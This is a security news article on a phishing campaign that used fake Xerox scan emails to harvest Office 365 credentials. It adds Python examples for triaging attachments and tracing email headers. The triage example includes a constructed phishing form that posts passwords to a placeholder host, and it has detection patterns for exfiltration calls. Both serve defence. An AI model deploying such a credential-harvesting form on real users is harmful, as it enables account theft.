A new large-scale phishing campaign targeting global organizations has been found to bypass Microsoft Office 365 Advanced Threat Protection (ATP) and steal credentials belonging to more than a thousand corporate employees.
The attack is said to have taken place in August last year and targeted energy and construction companies, researchers at Check Point Research said today in a joint analysis with industrial cybersecurity firm Otorio.
Although credential-stealing phishing campaigns are among the most common causes of data breaches, what makes this one stand out is an operational mistake by the attackers: the way they stored the credentials they had stolen inadvertently exposed them on the public internet.
"With a simple Google search, anyone could find the password of a compromised email," the researchers said.
The attack began with phishing emails posing as Xerox (or Xeros) scan notifications and carrying an HTML attachment. When opened, the file rendered a fake Office 365 login page that prompted the recipient to enter their password. The submitted credentials were then exfiltrated to a remote server, which appended them to a plain text file.
To do this, the campaign relied on a mix of dedicated infrastructure and compromised WordPress servers, which the attackers used to store the harvested credentials.
Because the stolen credentials were written to plain text files in web-accessible locations on these servers, search engines such as Google were able to index those pages, leaving the passwords retrievable by anyone who ran the right search.
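The attachment described above is a self-contained HTML page that draws a login form and ships whatever is typed into it to a server the attacker controls. The following is an added example, not code from the Check Point or Otorio researchers, of a static triage check a mail gateway or analyst could run over such an attachment: it flags a file that contains a password field and posts it, via a form action or inline script, to a host outside an allowlist. The sample attachments, the allowlist, and the `.invalid` hostnames are constructed for the example and are not indicators from the real campaign.

```python
"""Triage an HTML e-mail attachment for credential-phishing indicators.

Added example (not from the Check Point / Otorio research): a static check
that flags an HTML file which renders a login form and sends whatever is
typed to a server outside the organisation's known-good hosts. Sample inputs
are constructed; the hostnames are placeholders, not real campaign IOCs.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts where a genuine Office 365 login form may legitimately post.
# Assumption for the example: adjust to the tenant's known-good hosts.
TRUSTED_HOSTS = {"login.microsoftonline.com", "login.microsoft.com"}

# JavaScript calls that indicate the page sends data somewhere by itself.
JS_EXFIL = re.compile(r"(XMLHttpRequest|fetch\s*\(|\.post\s*\(|navigator\.sendBeacon)", re.I)
URL_IN_JS = re.compile(r"""https?://[^\s'"<>]+""", re.I)


class PhishFormParser(HTMLParser):
    """Collect form actions, password inputs and script bodies from HTML."""

    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_fields = 0
        self.scripts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # html.parser hands over <script> bodies as raw data, so we can scan them.
        if self._in_script:
            self.scripts.append(data)


def external_hosts(urls):
    """Return hostnames from absolute URLs that are not in TRUSTED_HOSTS."""
    hosts = set()
    for u in urls:
        host = urlparse(u).hostname
        if host and host.lower() not in TRUSTED_HOSTS:
            hosts.add(host.lower())
    return hosts


def triage_attachment(html):
    """Return indicators for one attachment; 'suspicious' is True when the file
    renders a password prompt and posts it (form action or script) externally."""
    p = PhishFormParser()
    p.feed(html)
    script_text = "\n".join(p.scripts)
    targets = external_hosts(p.form_actions + URL_IN_JS.findall(script_text))
    js_exfil = bool(JS_EXFIL.search(script_text))
    return {
        "password_fields": p.password_fields,
        "external_targets": sorted(targets),
        "js_exfil": js_exfil,
        "suspicious": p.password_fields > 0 and (bool(targets) or js_exfil),
    }


# Constructed sample: a fake scan notification whose login form posts to a
# placeholder third-party host (.invalid is a reserved TLD, not a real site).
SAMPLE_PHISH = """<html><body>
<h2>Xerox Scan - 1 document pending</h2>
<form method="post" action="https://wp-victim.example.invalid/wp-content/themes/x/post.php">
  <input type="email" name="u"><input type="password" name="p">
  <input type="submit" value="Open document">
</form></body></html>"""

# Constructed sample: a benign HTML report with no credential prompt at all.
SAMPLE_BENIGN = """<html><body><h1>Monthly usage report</h1>
<p>Pages scanned: 412</p></body></html>"""

if __name__ == "__main__":
    for name, doc in (("phish", SAMPLE_PHISH), ("benign", SAMPLE_BENIGN)):
        print(name, triage_attachment(doc))
```

The check is deliberately conservative: a form that posts to an allowlisted Microsoft host is not flagged, and a page with no password field is ignored, so a plain HTML report passes. Attackers can obfuscate the destination (base64-encoded URLs, string concatenation), so a miss here is not a clean bill of health; a hit, however, is a reliable reason to quarantine the message.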
In addition, by analyzing the email headers used across the campaign, the researchers concluded that the messages were sent from a Linux server hosted on Microsoft Azure.
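The header analysis mentioned above boils down to walking the Received: chain back to the first relay that handed the message in. The following is an added example, not the researchers' tooling, that extracts each hop's HELO name, reverse DNS and IP from a message and returns the originating one. The sample message, its hostnames and its IP addresses (from the RFC 5737 documentation ranges) are constructed and are not indicators from the real campaign. Attributing that IP to a hosting provider such as Azure is a separate step against published IP ranges or WHOIS, which this example does not do.

```python
"""Walk the Received: chain of an e-mail to find the originating relay.

Added example, not the researchers' tooling. The message below is constructed,
and its hostnames and IP addresses are placeholders (RFC 5737 documentation
ranges), not indicators from the real campaign.
"""
import re
from email import message_from_string

# Matches "from <helo-name> (<rdns> [<ip>])" as written by common MTAs
# (Postfix, Exim, Exchange). The parenthesised part or the IP may be absent.
RECEIVED_RE = re.compile(
    r"from\s+(?P<helo>\S+)"
    r"(?:\s*\((?P<rdns>[^\s\[\)]*)\s*\[?(?P<ip>[0-9a-fA-F.:]+)?\]?\))?"
)


def received_hops(raw_message):
    """Return the Received: hops ordered from the sender outward (earliest first).

    Each MTA prepends its own Received: header, so the last one in the message
    is the first hop. Only headers added by relays you control are trustworthy;
    anything below them could have been forged by the sender before submission.
    """
    msg = message_from_string(raw_message)
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        flat = " ".join(hdr.split())  # unfold continuation lines
        m = RECEIVED_RE.search(flat)
        hops.append({
            "helo": m.group("helo") if m else None,
            "rdns": (m.group("rdns") or None) if m else None,
            "ip": m.group("ip") if m else None,
            "raw": flat,
        })
    return hops


def origin_server(raw_message):
    """The first hop: HELO name, reverse DNS and IP of the submitting server."""
    hops = received_hops(raw_message)
    return hops[0] if hops else None


# Constructed sample headers. 203.0.113.0/24 and 198.51.100.0/24 are
# documentation-only ranges; the hostnames and date are invented.
SAMPLE_EMAIL = """Received: from mx1.recipient.example.invalid (mx1.recipient.example.invalid [198.51.100.7])
 by mail.recipient.example.invalid (Postfix) with ESMTPS id 4F3B2;
 Mon, 1 Jan 2001 00:00:02 +0000 (UTC)
Received: from relay.sender.example.invalid (unknown [203.0.113.44])
 by mx1.recipient.example.invalid (Postfix) with ESMTP id 1A2B3;
 Mon, 1 Jan 2001 00:00:01 +0000 (UTC)
From: "Xerox Scanner" <scanner@spoofed.example.invalid>
To: finance@recipient.example.invalid
Subject: Scan from Xerox WorkCentre

Your document is attached.
"""

if __name__ == "__main__":
    for hop in received_hops(SAMPLE_EMAIL):
        print(hop["ip"], hop["helo"], hop["rdns"])
    print("origin:", origin_server(SAMPLE_EMAIL))
```

In the sample the first hop announces itself as `relay.sender.example.invalid` but has no reverse DNS ("unknown") and a different address than the From: domain would suggest; that mismatch between HELO name, reverse DNS, IP and the claimed sender is exactly what an analyst looks at when deciding which hop is the real origin and whether the header chain has been tampered with.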
To mitigate these threats, users are advised to be wary of emails from unknown senders and to avoid clicking suspicious links or opening unexpected attachments.
Source of information: thehackernews.com